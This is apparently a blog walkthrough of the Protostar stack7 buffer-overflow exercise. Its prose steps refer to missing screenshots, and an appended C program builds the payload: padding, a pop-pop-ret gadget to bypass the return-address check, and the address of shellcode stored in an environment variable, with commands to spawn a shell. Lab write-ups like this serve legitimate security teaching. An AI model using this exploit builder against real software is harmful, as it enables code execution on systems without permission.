Here we go...
This time we will start here:
The vulnerable source code is known, and gets() should already be familiar to you (after reading this book ;)). The twist in stack7 is that getpath() checks its own return address before returning, and refuses anything that looks like a stack address (0xb.......). So we can still try to take over the program's flow, we just cannot return straight to the stack.
Let's run stack7 in gdb (just like we did last time). We should be here:
Good. Checking getpath():
Let's set a breakpoint at the end of the getpath() function, on the ret instruction at 0x08048544:
Now we switch from gdb to the shell to prepare a payload file:
So far, so good. :) Checking ESP:
According to the source our buffer is 64 bytes long. Let's modify our payload file to make it larger:
Looks better now. ;) Let's try to modify it a little bit more:
At this stage I decided to look for a pop-pop-ret gadget. To do that I used:
Good. We will need that value later: a gadget inside the binary has an address of the form 0x0804...., which passes the check getpath() does on its return address, and after its two pops the gadget's own ret jumps to whatever dword follows on the stack, and that second address is never checked.
Let's modify our poc-payload:
Now we need to store the shellcode somewhere in memory. I used an environment variable, SCODE, for that:
To get the address of the variable I used a simple program from the old tutorials, get_sp.c ;)
For now our poc-payload looks like this:
We are ready to check it:
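Since the screenshots carry the actual values, here is the same procedure as a small helper program. This is an added example, not the author's code or anything from Protostar: it does what the post does by hand, i.e. finds the address of the SCODE environment variable (the get_sp.c step, using the classic getenvaddr name-length adjustment) and writes the poc-payload file with the pop-pop-ret trampoline in front of the shellcode address. Assumptions not taken from the post: the offset from the start of buffer[64] to the saved return address (default 80: the buffer plus compiler padding and the saved EBP; take the real value from your gdb session), the gadget address (passed as an argument, since the post's value is only in the screenshot), and that stack7 is started from the same shell as this tool on the 32-bit Protostar box with ASLR off. The return-address check reproduced in ret_is_rejected() is the one from the stack7 source.

```c
/*
 * mkpayload.c: added example, not the blog author's code. Builds the
 * poc-payload file for stack7: filler, pop;pop;ret gadget (passes the
 * 0xb....... check), two junk dwords (eaten by the pops), address of the
 * SCODE environment variable (reached by the gadget's ret, never checked).
 * Assumptions: ret offset 80 unless overridden, 32-bit target, no ASLR,
 * same environment for this tool and for stack7.
 */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* The filter getpath() applies: any return address of the form 0xb....... is fatal. */
int ret_is_rejected(uint32_t ret)
{
    return (ret & 0xb0000000u) == 0xb0000000u;
}

/* x86 stores the least significant byte first. */
static void put32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

/*
 * getenvaddr-style adjustment: the environment sits at the top of the stack
 * and the program name is stored twice above it, so a target whose path is a
 * different length from ours shifts every variable by twice the difference.
 * Unsigned arithmetic wraps as intended when the target name is longer.
 */
uintptr_t adjust_env_addr(uintptr_t here, size_t self_len, size_t target_len)
{
    return here + 2u * self_len - 2u * target_len;
}

/* Address `name` will have inside `target` when started from this shell; 0 if unset. */
uintptr_t env_addr_in_target(const char *name, const char *self, const char *target)
{
    const char *p = getenv(name);
    if (!p)
        return 0;
    return adjust_env_addr((uintptr_t)p, strlen(self), strlen(target));
}

/*
 * Only the first dword after the filler is ever seen by the check, so it holds
 * the 0x0804xxxx gadget; the gadget's two pops eat the junk dwords and its ret
 * lands on the 0xbfff.... shellcode address. Returns 0 if `out` is too small.
 */
size_t build_payload(unsigned char *out, size_t cap, size_t ret_offset,
                     uint32_t gadget, uint32_t scode)
{
    size_t need = ret_offset + 4 * sizeof(uint32_t);
    if (cap < need)
        return 0;
    memset(out, 'A', ret_offset);              /* buffer[64], padding, saved EBP */
    put32(out + ret_offset,      gadget);      /* saved return address -> pop; pop; ret */
    put32(out + ret_offset + 4,  0x42424242u); /* consumed by the first pop */
    put32(out + ret_offset + 8,  0x43434343u); /* consumed by the second pop */
    put32(out + ret_offset + 12, scode);       /* gadget's ret -> shellcode in SCODE */
    return need;
}

/* gets() stops at 0x0a, so an address containing that byte would truncate the payload. */
int payload_has_newline(const unsigned char *p, size_t n)
{
    return memchr(p, '\n', n) != NULL;
}

int main(int argc, char **argv)
{
    unsigned char payload[256];
    uint32_t gadget, scode;
    size_t off = 80, n;   /* assumption: distance from buffer[0] to the saved return address */

    if (argc < 3) {
        fprintf(stderr, "usage: %s <pop-pop-ret hex> <target path, e.g. ./stack7> [ret offset]\n", argv[0]);
        return 1;
    }
    gadget = (uint32_t)strtoul(argv[1], NULL, 16);
    scode  = (uint32_t)env_addr_in_target("SCODE", argv[0], argv[2]);
    if (argc > 3)
        off = strtoul(argv[3], NULL, 10);
    if (scode == 0) { fprintf(stderr, "SCODE is not exported\n"); return 1; }
    if (ret_is_rejected(gadget)) { fprintf(stderr, "%#x would trip the return address check\n", gadget); return 1; }
    n = build_payload(payload, sizeof payload, off, gadget, scode);
    if (n == 0 || payload_has_newline(payload, n)) { fprintf(stderr, "payload unusable\n"); return 1; }
    FILE *f = fopen("poc-payload", "wb");
    if (!f) { perror("poc-payload"); return 1; }
    fwrite(payload, 1, n, f);
    fclose(f);
    printf("gadget %#x, SCODE at %#x, %zu bytes written to poc-payload\n", gadget, scode, n);
    return 0;
}
```

Export SCODE (a NOP sled followed by the shellcode) in the shell, build the file with `./mkpayload <gadget> ./stack7`, and feed it with `(cat poc-payload; cat) | ./stack7` so the spawned shell keeps a usable stdin. Two caveats a practitioner will hit: the computed SCODE address is only valid when stack7 is started from the same shell with the same environment, so it will not match what you see under gdb (the debugger adds its own variables and shifts the stack), and the tool must be compiled as a 32-bit binary on the Protostar box, otherwise the pointer truncation to uint32_t is meaningless.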
Now we are ready to move to the next case... :)
See you soon!
Cheers
How exactly are you bypassing the return address check at line 17? Wasn't it meant to be a ret2libc exploit?
Sorry to disappoint you :| I just changed the proposed 0xb... to something else (which was the place with the shellcode).